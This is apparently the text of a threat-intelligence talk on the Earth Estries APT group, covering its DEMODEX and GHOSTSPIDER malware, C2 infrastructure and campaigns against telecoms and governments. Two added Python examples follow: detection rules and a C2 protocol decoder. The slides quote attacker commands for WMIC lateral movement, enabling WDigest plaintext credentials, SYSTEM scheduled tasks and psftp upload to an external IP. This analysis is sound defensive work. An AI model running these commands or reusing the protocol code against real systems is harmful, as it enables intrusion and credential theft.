#### Game of Emperor: Unveiling Long Term Earth Estries Cyber Intrusions
###### Leon Chang, Theo Chen
2025/01/21 @ JSAC2025
-----
### Whoami
###### Leon Chang
Sr. Threat Researcher
APT Campaign Tracking / Threat Intelligence / Malware Analysis
###### Theo Chen
Sr. Threat Researcher
Penetration Testing / Malware Analysis / Threat Hunting
-----
# Agenda
-----
### Agenda
##### • The Earth Estries threat group overview
• Campaign Overview
###### − Campaign Alpha
− Campaign Beta
− Others
##### • Attribution
• Conclusion
-----
## The Earth Estries threat group overview
-----
### Victimology
-----
### Earth Estries - Profile
-----
### Alias
###### UNC2286[7] and Salt Typhoon represent a threat group/cluster whose activity overlaps with campaigns tracked by other security organizations under names such as GhostEmperor[4] and FamousSparrow[5]. Similarly, Earth Estries, Trend Micro's designation for this group, also overlaps with the activity attributed to GhostEmperor and FamousSparrow.
###### Reference: https://learn.microsoft.com/en-us/defender-xdr/microsoft-threat-actor-naming
-----
### Earth Estries – Toolset Overview
-----
### Motivation
###### Earth Estries
###### Targeting multiple government entities
##### Attack
###### Continuous attacks on telecommunications companies
Organizations that have business dealings with governments and telecommunications providers (e.g. technology, NGO, etc.)
-----
### Why US NGO?
###### Communications with Congress, federal agencies, the White House, Council members, and the higher education community
Provides training services for military units
Provides data and analysis to institutional leaders, policy makers, and practitioners
-----
## Campaign Overview
-----
### Campaign Timeline
###### Campaign Alpha (Part 1): Campaign targeting Government, Chemistry and Transportation in the APAC region
Tools: DEMODEX, SNAPPYBEE, Cobalt Strike, etc.
###### Campaign Alpha (Part 2): Found US NGO leaked data on C2
###### Old Campaign
Industry: Government, Telecom, Property, Technology, Aviation, etc.
Country: TH, VN, PH, ID, IN, AF and TW.
Tools: DEMODEX, GHOSTSPIDER, SparrowDoor, etc.
###### Campaign Beta: A long-term campaign targeting telecom companies in Taiwan, Thailand, Indonesia, Vietnam, the Philippines, Afghanistan and the United States.
Tools: DEMODEX, GHOSTSPIDER and SoftEther VPN
-----
### Campaign Alpha Overview
-----
### Campaign Beta Overview
-----
## Campaign Alpha
-----
### The beginning
###### • We observed some interesting malicious samples on a C2, 23.81.41[.]166:80, in Oct. 2023.
• The possible C2 active timeline: 2023/10/12 ~ 2024/04/02.

|Notable File|Description|
|---|---|
|sql.toml|frp config (C2 server: 165.154.227[.]192)|
|onedrived.zip|Contains a PowerShell script, ondrived.ps1.|
|Nsc.exe|The first SNAPPYBEE sample set. SNAPPYBEE C2 domain: api.solveblemten[.]com|
|123.zip/WINMM.dll||
|NortonLog.txt||
|0202/*|Another SNAPPYBEE sample set (imfsbSvc.exe, imfsbDll.dll, DgApi.dll and dbindex.dat). SNAPPYBEE C2 domain: esh.hoovernamosong[.]com|
|Others|Open source hacktools such as frpc, the NeoReGeorg tunnel and fscan.|
-----
### Additional frp C2 Findings
###### The C2 165.154.227[.]192 is also mentioned in some Ivanti exploitation reports:
1. https://fortiguard.fortinet.com/jp/outbreak-alert/ivanti-authentication-bypass
2. https://gist.github.com/andrew-morris/7679a18ef815068897bf27bf631f2ede
-----
### The Link to GhostEmperor
-----
### DEMODEX Infection Chain
###### • Analysis requirements:
1. First-stage PowerShell script: requires a decryption key as an argument
2. Second-stage service loader: uses the computer name as the AES key
###### Control Flow Flattening
-----
### DEMODEX Analysis Screenshots
###### Anti-analysis techniques
Decrypted C2 configuration
Control Flow Flattening
-----
### Campaign Alpha Post-exploitation Findings
###### frp config
frp C2 server

|Tools / Type|Description|
|---|---|
|frp related|• `WMIC.exe /node: /user: /password: process call create "cmd.exe /c expand c:/windows/debug/1.zip c:/windows/debug/notepadup.exe"` • `WMIC.exe /node: /user: /password: process call create "cmd.exe /c c:/windows/debug/notepadup.exe -c c:/windows/debug/sql.toml"` • `cmd.exe /c ping 165.154.227.192 -n 1 > c:\Windows\debug\info.log` • `cmd.exe /c expand c:/windows/debug/1.zip c:/windows/debug/win32up.exe` • `cmd.exe /c c:/windows/debug/win32up.exe -c c:/windows/debug/sql.toml`|
|collect host information|• `cmd.exe /c tasklist /v > c:\windows\debug\info.log` • `cmd.exe /c wevtutil qe security /format:text /q:\"Event[System[(EventID=4624)]\" > c:\windows\debug\info.log` (find logon user information: username, logon IP address)|
|ps.exe (PSEXEC.exe)|• `C:\Windows\assembly\ps.exe /accepteula \\ -u -p -s cmd /c c:\Windows\assembly\1.bat` • `WMIC.exe /node: /user: /password: process call create "cmd.exe /c c:\Windows\debug\1.bat"`|
-----
### Exfiltration – US NGO entity
###### (TLP:RED) Projection only
-----
### SNAPPYBEE Analysis Screenshot
###### Main module id: 0x20
-----
### Campaign Alpha C2 Infrastructure Analysis
###### Question: Are these infrastructures with the same registration information all used by the same group?
-----
## Campaign Beta
-----
### New DEMODEX Installation Flow
-----
### New DEMODEX Infection Flow
###### Difference: The new infection chain no longer uses a first-stage PowerShell script to deploy the additional payloads it needs. The payloads required for installation are bundled in a CAB file.
-----
### Operation Mistakes?
###### • The DEMODEX C&C domain pulseathermakf[.]com has been used to target Southeast Asian governments for several years
• We detected a network connection to pulseathermakf[.]com from a compromised server belonging to a Southeast Asian telecommunications company
###### Made a mistake in packing the sample?
-----
### Campaign Beta: Notable Malicious Activities
###### DEMODEX loader
`"C:\WINDOWS\system32\taskkill.exe" /fi "modules eq WpcCfg.dll" /f`
###### Find administrator-equivalent logon user information (username, logon IP address)
`wevtutil qe security /rd:true /f:text /q:"*[System/EventID=4624 and 4672] and *[EventData/Data[@Name='TargetUserName']='']" /c:50`
###### `powershell -ex bypass .\u.ps1`
`powershell -ex bypass .\fireup.ps1 <complex_random_password>`
`powershell -ex bypass .\upload.ps1 <complex_random_password>`
###### `powershell.exe Test-NetConnection -RemoteAddress -Port`
###### `reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f`
When UseLogonCredential is set to 1, WDigest keeps plaintext credentials in LSASS memory, where they can be dumped
###### `schtasks /create /tn gs /tr c:\windows\web\pings.bat /sc once /st 20:32:00 /ru system`
`C:\Windows\SYSTEM32\cmd.exe /c "c:\windows\web\debug.bat"`
`C:\Windows\Web\psftp.exe 203.20.113[.]208 -P 443 -l -pw -b 1.txt`
-----
#### Sophisticated Multi-modular Backdoor: GHOSTSPIDER
###### • We found a previously unknown backdoor, GHOSTSPIDER, in an APAC telecom company.
− GHOSTSPIDER Stager: c:\windows\web\web.dll (DLL original name: spider.dll)
• We have observed GHOSTSPIDER activity since 2021.
− We identified some old samples compiled on 2021/11/18.
− The GHOSTSPIDER C2 domain jasmine.lhousewares[.]com has been active since 2021/12.
− We confirmed the attacker utilized GHOSTSPIDER around 2022/12.
• We suspect GHOSTSPIDER and the DEMODEX toolset were developed by the same group
− Both backdoors have components written in two languages (C++ and .NET), are multi-modular, and are loaded in memory.
− Both target a specific host (DEMODEX requires the hostname to decrypt its payload; GHOSTSPIDER checks a hardcoded hostname)
-----
### GHOSTSPIDER's Technique Analysis - Overview
###### • Another TTP overlap between DEMODEX and GHOSTSPIDER
− Possibly learned from the Cobalt Strike framework?
• DEMODEX has a Malleable C2 profile
• GHOSTSPIDER has a similar design, with a Stager (optional) and a Beacon (client).
• Challenge: The final payload/module is retrieved from the C2 server only for selected victims
-----
### GHOSTSPIDER's Technique Analysis - Stager
###### • We observed the threat actor installing the first-stage stager via regsvr32.exe.
• The stager checks for a specific hostname hard-coded in the DLL.
• Once executed, the stager connects to the stager's C&C server to register a new connection and subsequently receives a module (DLL export name: login.dll).
− Stager C2: hxxps[:]//billing[.]clothworls[.]com/index.php & https[:]//telcom[.]grishamarkovgf8936[.]workers[.]dev/index.php
`regsvr32.exe /s c:\windows\web\web.dll`
-----
### GHOSTSPIDER's Technique Analysis – Beacon (1/2)
###### • We observed the threat actor deploying a legitimate executable file alongside a malicious DLL file
Beacon loader deployment
-----
### GHOSTSPIDER's Technique Analysis – Beacon (2/2)
###### • This malicious DLL is another GHOSTSPIDER module, known as the beacon loader
− This component is used to launch the beacon payload in memory
• The beacon loader contains an encrypted .NET DLL payload (DLL export name: client.dll), which is decrypted and executed in memory.
− Beacon C2: hxxps[:]//jasmine[.]lhousewares[.]com/ & hxxps[:]//private[.]royalnas[.]com/index.php
Beacon loader deployment
-----
#### GHOSTSPIDER Stager Communication Protocol - Request
###### • The requests used by the GHOSTSPIDER stager follow a common format
− The connection ID is placed in the HTTP header's cookie as "phpsessid"
− The connection ID is calculated using CRC32 or CRC64 over UUID4 values
-----
#### GHOSTSPIDER Stager Communication Protocol - Response
###### • The decrypted response data is separated by "|" with the following items:
− An unknown prefix
− did: the connection ID calculated on the infected machine
− wid: the remote ID for a specific connection
− act: an action code
− tt: tick count
− An unknown suffix
```
=|did=96A52F5C1F2C2C67|wid=13CF3E8E0E5580EB|act=2|tt=41003562|
```
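The command lines quoted on the Campaign Alpha post-exploitation slide (WMIC remote process creation, frp client expanded out of a fake `.zip`, `wevtutil` against the Security log) and the Campaign Beta activities slide (WDigest `UseLogonCredential=1`, `regsvr32 /s` from `C:\Windows\Web`, a SYSTEM scheduled task from the same directory, `taskkill` by module filter, `psftp` to a raw IP on 443) are all visible in process-creation telemetry. The following is an added example, not tooling from the presentation: a set of regex triage rules run over constructed telemetry that reuses the slides' command lines (values redacted as on the slides) plus benign noise. The hostnames and the (host, command line) record layout are constructed for the example.

```python
"""Triage Windows process-creation command lines for the Earth Estries
post-exploitation patterns shown on the Campaign Alpha and Campaign Beta
slides. Added example; the telemetry below is constructed, not real logs."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern
    note: str


# Each rule keys on a distinctive token of the observed technique rather than
# on the exact quoted command line, so it also fires on variants with other
# paths or arguments. Path separators accept both "\" and "/" (the slides show
# both). All rules are case-insensitive.
RULES = [
    Rule("wdigest_cleartext_creds",
         re.compile(r"reg(?:\.exe)?\s+add\s+.*SecurityProviders\\WDigest.*UseLogonCredential.*\s/d\s+1\b", re.I),
         "UseLogonCredential=1 makes WDigest keep plaintext credentials in LSASS"),
    Rule("security_log_logon_enum",
         re.compile(r"wevtutil(?:\.exe)?\s+qe\s+security\b.*\b(?:4624|4672)\b", re.I),
         "Security log queried for 4624/4672 to list logged-on (admin) users and source IPs"),
    Rule("wmic_remote_process_create",
         re.compile(r"wmic(?:\.exe)?\s+/node:.*process\s+call\s+create", re.I),
         "remote process creation over WMI (lateral movement / frp staging)"),
    Rule("regsvr32_silent_from_windows_web",
         re.compile(r"regsvr32(?:\.exe)?\s+/s\s+\S*[\\/]windows[\\/](?:web|debug)[\\/]", re.I),
         "silent registration of a DLL dropped under C:\\Windows\\Web (GHOSTSPIDER stager)"),
    Rule("schtasks_system_from_windows_web",
         re.compile(r"schtasks(?:\.exe)?\s+/create\b.*/tr\s+\S*[\\/]windows[\\/]web[\\/].*/ru\s+system\b", re.I),
         "scheduled task running as SYSTEM from C:\\Windows\\Web"),
    Rule("taskkill_by_module_filter",
         re.compile(r'taskkill(?:\.exe)?\b.*/fi\s+"?modules\s+eq\s+', re.I),
         "taskkill by loaded-module filter (DEMODEX loader cleanup)"),
    Rule("psftp_to_external_443",
         re.compile(r"psftp(?:\.exe)?\s+\d{1,3}(?:(?:\.|\[\.\])\d{1,3}){3}\s+-P\s+443\b", re.I),
         "psftp to a raw IP on 443 (file transfer over a non-SFTP port)"),
    Rule("expand_zip_to_exe_in_debug",
         re.compile(r"\bexpand\s+\S*[\\/]windows[\\/]debug[\\/]\S+\.zip\s+\S+\.exe", re.I),
         "CAB disguised as .zip expanded to an .exe in C:\\Windows\\debug (frp client)"),
]

# Constructed telemetry: (host, command line). The first nine lines reuse the
# slides' quoted commands; the WS-17 lines are benign noise that must not fire.
SAMPLE_TELEMETRY = [
    ("SRV-01", 'WMIC.exe /node: /user: /password: process call create "cmd.exe /c expand c:/windows/debug/1.zip c:/windows/debug/notepadup.exe"'),
    ("SRV-01", "cmd.exe /c expand c:/windows/debug/1.zip c:/windows/debug/win32up.exe"),
    ("SRV-01", 'cmd.exe /c wevtutil qe security /format:text /q:"Event[System[(EventID=4624)]]" > c:\\windows\\debug\\info.log'),
    ("SRV-02", '"C:\\WINDOWS\\system32\\taskkill.exe" /fi "modules eq WpcCfg.dll" /f'),
    ("SRV-02", "wevtutil qe security /rd:true /f:text /q:\"*[System/EventID=4624 and 4672] and *[EventData/Data[@Name='TargetUserName']='']\" /c:50"),
    ("SRV-02", "reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f"),
    ("SRV-02", "schtasks /create /tn gs /tr c:\\windows\\web\\pings.bat /sc once /st 20:32:00 /ru system"),
    ("SRV-02", "regsvr32.exe /s c:\\windows\\web\\web.dll"),
    ("SRV-02", "C:\\Windows\\Web\\psftp.exe 203.20.113[.]208 -P 443 -l -pw -b 1.txt"),
    ("WS-17", "reg add HKLM\\SOFTWARE\\Contoso\\Agent /v Enabled /t REG_DWORD /d 1 /f"),
    ("WS-17", "schtasks /create /tn Backup /tr C:\\Program Files\\Backup\\run.exe /sc daily /st 01:00 /ru system"),
    ("WS-17", "regsvr32.exe /s C:\\Program Files\\Vendor\\vendor.dll"),
    ("WS-17", "wevtutil qe application /c:5"),
]


def triage(telemetry):
    """Return one (host, rule name, command line) tuple per rule each line matches."""
    hits = []
    for host, cmdline in telemetry:
        for rule in RULES:
            if rule.pattern.search(cmdline):
                hits.append((host, rule.name, cmdline))
    return hits


def hosts_by_rule(hits):
    """Group hits as {rule name: sorted hosts}, to see which hosts show the
    whole chain (staging, credential access, persistence, exfiltration)."""
    grouped = {}
    for host, name, _ in hits:
        grouped.setdefault(name, set()).add(host)
    return {name: sorted(hosts) for name, hosts in grouped.items()}


if __name__ == "__main__":
    for host, name, cmd in triage(SAMPLE_TELEMETRY):
        print(f"{host:7} {name:34} {cmd[:70]}")
```

The WDigest rule is the one worth deploying as-is: there is no legitimate reason for `UseLogonCredential` to be set to 1 on a modern Windows host, so a single hit is actionable. The path-based rules (`C:\Windows\Web`, `C:\Windows\debug`) are specific to this actor's tradecraft and should be tuned to whatever writable-but-unusual system directories show up in your own telemetry.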
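The two protocol slides above describe the stager's request (a connection ID derived from a UUID4 via CRC32 or CRC64, carried in the `phpsessid` cookie) and the decrypted response (a `|`-separated record with `did`, `wid`, `act` and `tt` items between an unknown prefix and suffix). The following is an added example, not code from the presentation or from the malware, that implements both sides of that exchange as a decoder an analyst can reuse: it derives a connection ID, builds and reads the cookie, and parses the decrypted response, checking that `did` matches the local connection ID. The slides do not name the CRC-64 variant or the response cipher, so CRC-64/XZ is an assumption and parsing starts from already-decrypted text. The sample response is the one quoted on the slide; the cookie header in the usage is constructed.

```python
"""Decoder for the GHOSTSPIDER stager exchange described on the "Stager
Communication Protocol" slides. Added example; CRC-64/XZ is an assumed
variant, and responses are handled after decryption (cipher not on the page)."""
import uuid
import zlib
from dataclasses import dataclass
from typing import Optional

CRC64_XZ_POLY_REFLECTED = 0xC96C5795D7870F42  # bit-reversed 0x42F0E1EBA9EA3693
MASK64 = 0xFFFFFFFFFFFFFFFF


def crc64_xz(data: bytes) -> int:
    """CRC-64/XZ: reflected, init and xorout all ones (assumed variant)."""
    crc = MASK64
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ (CRC64_XZ_POLY_REFLECTED if crc & 1 else 0)
    return crc ^ MASK64


def connection_id(u: Optional[uuid.UUID] = None, width: int = 64) -> str:
    """Connection ID as the slide describes it: CRC32 or CRC64 of a UUID4,
    rendered as upper-case hex (8 or 16 digits, like the did/wid values)."""
    u = u or uuid.uuid4()
    if width == 32:
        return f"{zlib.crc32(u.bytes) & 0xFFFFFFFF:08X}"
    if width == 64:
        return f"{crc64_xz(u.bytes):016X}"
    raise ValueError("width must be 32 or 64")


def build_cookie(conn_id: str) -> str:
    """Cookie header value carrying the connection ID as phpsessid."""
    return f"phpsessid={conn_id}"


def extract_connection_id(cookie_header: str) -> Optional[str]:
    """Server-side view: pull phpsessid out of a Cookie header, or None."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name.lower() == "phpsessid":
            return value
    return None


@dataclass(frozen=True)
class StagerResponse:
    prefix: str   # unknown leading item (slide: "An unknown prefix")
    did: str      # connection ID computed on the infected machine
    wid: str      # remote ID for this connection
    act: int      # action code
    tt: int       # tick count
    suffix: str   # unknown trailing item (slide: "An unknown suffix")


def parse_response(decrypted: str, expected_did: Optional[str] = None) -> StagerResponse:
    """Split the decrypted response on "|" and read the key=value items.
    The first and last items are kept verbatim as prefix/suffix. When
    expected_did is given, the did must equal this host's connection ID."""
    items = decrypted.split("|")
    if len(items) < 6:
        raise ValueError("too few fields")
    prefix, suffix = items[0], items[-1]
    fields = {}
    for item in items[1:-1]:
        key, sep, value = item.partition("=")
        if not sep:
            raise ValueError(f"malformed item {item!r}")
        fields[key] = value
    missing = {"did", "wid", "act", "tt"} - fields.keys()
    if missing:
        raise ValueError(f"missing fields {sorted(missing)}")
    if expected_did is not None and fields["did"].upper() != expected_did.upper():
        raise ValueError("did does not match this host's connection ID")
    return StagerResponse(prefix, fields["did"], fields["wid"],
                          int(fields["act"]), int(fields["tt"]), suffix)


# Decrypted response quoted on the slide.
SAMPLE_RESPONSE = "=|did=96A52F5C1F2C2C67|wid=13CF3E8E0E5580EB|act=2|tt=41003562|"

if __name__ == "__main__":
    cid = connection_id()
    print("Cookie:", build_cookie(cid))                      # constructed request side
    print(extract_connection_id("lang=en; " + build_cookie(cid)) == cid)
    print(parse_response(SAMPLE_RESPONSE))
```

Because the ID is only a CRC of a random UUID, it carries no host information; the `did` check on the response side is what ties a reply to the connection that requested it, which is also why the `did` value is a useful pivot when correlating decrypted C2 traffic across hosts.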